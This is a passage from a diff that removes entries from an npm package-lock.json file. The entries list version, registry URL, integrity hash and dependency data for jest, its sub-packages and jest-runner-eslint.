"node_modules/jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "dependencies": { - "@isaacs/cliui": "^8.0.2" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - }, - "optionalDependencies": { - "@pkgjs/parseargs": "^0.11.0" - } - }, - "node_modules/jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner-eslint": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/jest-runner-eslint/-/jest-runner-eslint-2.2.1.tgz", - "integrity": "sha512-BSAB65hGhtr/Kmb7tSkfqFmK9LYwCMK8L1xcp+XaSToPFqr7sY1jleMZUeDhV0ITA33pW+JUCx5a02veVD2Q2w==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "cosmiconfig": "^7.0.0", - "create-jest-runner": "^0.11.2", - "dot-prop": "^6.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "eslint": "^7 || ^8", - "jest": "^27 || ^28 || ^29" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/console": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-28.1.3.tgz", - "integrity": "sha512-QPAkP5EwKdK/bxIr6C1I4Vs0rm2nHiANzj/Z5X2JQkrZo6IqvC4ldZ9K95tF0HdidhA8Bo6egxSzUFPYKcEXLw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/environment": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-28.1.3.tgz", - "integrity": "sha512-1bf40cMFTEkKyEf585R9Iz1WayDjHoHqvts0XFYEqyKM3cFWDpeMoqKKTAF9LSYQModPUlh8FKptoM2YcMWAXA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-lzc8CpUbSoE4dqT0U+g1qODQjBRHPpCPXissXD4mS9+sWQdmmpeJ9zSH1rS1HEkrsMN0fb7nKrJ9giAR1d3wBw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "expect": "^28.1.3", - "jest-snapshot": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/expect-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-28.1.3.tgz", - "integrity": "sha512-wvbi9LUrHJLn3NlDW6wF2hvIMtd4JUl2QNVrjq+IBSHirgfrR3o9RnVtxzdEGO2n9JyIWwHnLfby5KzqBGg2YA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "jest-get-type": "^28.0.2" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/fake-timers": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-28.1.3.tgz", - "integrity": "sha512-D/wOkL2POHv52h+ok5Oj/1gOG9HSywdoPtFsRCUmlCILXNn5eIWmcnd3DIiWlJnpGvQtmajqBP95Ei0EimxfLw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@sinonjs/fake-timers": "^9.1.2", - "@types/node": "*", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/globals": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-28.1.3.tgz", - "integrity": "sha512-XFU4P4phyryCXu1pbcqMO0GSQcYe1IsalYCDzRNyhetyeyxMcIxa11qPNDpVNLeretItNqEmYYQn1UYz/5x1NA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/expect": "^28.1.3", - "@jest/types": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/schemas": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-28.1.3.tgz", - "integrity": "sha512-/l/VWsdt/aBXgjshLWOFyFt3IVdYypu5y2Wn2rOO1un6nkqIn8SLXzgIMYXFyYsRWDyF5EthmKJMIdJvk08grg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@sinclair/typebox": "^0.24.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/source-map": { - "version": "28.1.2", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-28.1.2.tgz", - "integrity": "sha512-cV8Lx3BeStJb8ipPHnqVw/IM2VCMWO3crWZzYodSIkxXnRcXJipCdx1JCK0K5MsJJouZQTH73mzf4vgxRaH9ww==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.13", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/test-result": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-28.1.3.tgz", - "integrity": "sha512-kZAkxnSE+FqE8YjW8gNuoVkkC9I7S1qmenl8sGcDOLropASP+BkcGKwhXoyqQuGOGeYY0y/ixjrd/iERpEXHNg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/console": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/transform": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-28.1.3.tgz", - "integrity": "sha512-u5dT5di+oFI6hfcLOHGTAfmUxFRrjK+vnaP0kkVow9Md/M7V/MxqQMOz/VV25UZO8pzeA9PjfTpOu6BDuwSPQA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^28.1.3", - "@jridgewell/trace-mapping": "^0.3.13", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^1.4.0", - "fast-json-stable-stringify": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/types": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-28.1.3.tgz", - "integrity": "sha512-RyjiyMUZrKz/c+zlMFO1pm70DcIlST8AeWTkoUdZevew44wcNZQHsEVOiCVtgVnlFFD82FPaXycys58cf2muVQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/schemas": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@sinclair/typebox": { - "version": "0.24.51", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.24.51.tgz", - "integrity": "sha512-1P1OROm/rdubP5aFDSZQILU0vrLCJ4fvHt6EoqHEM+2D/G5MK3bIaymUKLit8Js9gbns5UyJnkP/TZROLw4tUA==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/jest-runner-eslint/node_modules/@sinonjs/commons": { - "version": "1.8.6", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-1.8.6.tgz", - "integrity": "sha512-Ky+XkAkqPZSm3NLBeUng77EBQl3cmeJhITaGHdYH8kjVB+aun3S4XBRti2zt17mtt0mIUDiNxYeoJm6drVvBJQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/jest-runner-eslint/node_modules/@sinonjs/fake-timers": { - "version": "9.1.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-9.1.2.tgz", - "integrity": "sha512-BPS4ynJW/o92PUR4wgriz2Ud5gpST5vz6GQfMixEDK0Z8ZCUv2M7SkBLykH56T++Xs+8ln9zTGbOvNGIe02/jw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@sinonjs/commons": "^1.7.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/jest-runner-eslint/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-runner-eslint/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/jest-runner-eslint/node_modules/create-jest-runner": { - "version": "0.11.2", - "resolved": "https://registry.npmjs.org/create-jest-runner/-/create-jest-runner-0.11.2.tgz", - "integrity": "sha512-6lwspphs4M1PLKV9baBNxHQtWVBPZuDU8kAP4MyrVWa6aEpEcpi2HZeeA6WncwaqgsGNXpP0N2STS7XNM/nHKQ==", - "dev": true, - "dependencies": { - "chalk": "^4.1.0", - "jest-worker": "^28.0.2", - "throat": "^6.0.1" - }, - "bin": { - "create-jest-runner": "generator/index.js" - }, - "peerDependencies": { - "@jest/test-result": "^28.0.0", - "jest-runner": "^28.0.0" - }, - "peerDependenciesMeta": { - "@jest/test-result": { - "optional": true - }, - "jest-runner": { - "optional": true - } - } - }, - "node_modules/jest-runner-eslint/node_modules/diff-sequences": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-28.1.1.tgz", - "integrity": "sha512-FU0iFaH/E23a+a718l8Qa/19bF9p06kgE0KipMOMadwa3SjnaElKzPaUC0vnibs6/B/9ni97s61mcejk8W1fQw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/emittery": { - "version": "0.10.2", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.10.2.tgz", - "integrity": "sha512-aITqOwnLanpHLNXZJENbOgjUBeHocD+xsSJmNrjovKBW5HbSpW3d1pEls7GFQPUWXiwG9+0P4GtHfEqC/4M0Iw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/jest-runner-eslint/node_modules/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-eEh0xn8HlsuOBxFgIss+2mX85VAS4Qy3OSkjV7rlBWljtA4oWH37glVGyOZSZvErDT/yBywZdPGwCXuTvSG85g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/expect-utils": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-diff": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-28.1.3.tgz", - "integrity": "sha512-8RqP1B/OXzjjTWkqMX67iqgwBVJRgCyKD3L9nq+6ZqJMdvjE8RgHktqZ6jNrkdMT+dJuYNI3rhQpxaz7drJHfw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^28.1.1", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-docblock": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-28.1.1.tgz", - "integrity": "sha512-3wayBVNiOYx0cwAbl9rwm5kKFP8yHH3d/fkEaL02NPTkDojPtheGB7HZSFY4wzX+DxyrvhXz0KSCVksmCknCuA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-environment-node": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-28.1.3.tgz", - "integrity": "sha512-ugP6XOhEpjAEhGYvp5Xj989ns5cB1K6ZdjBYuS30umT4CQEETaxSiPcZ/E1kFktX4GkrcM4qu07IIlDYX1gp+A==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-get-type": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-28.0.2.tgz", - "integrity": 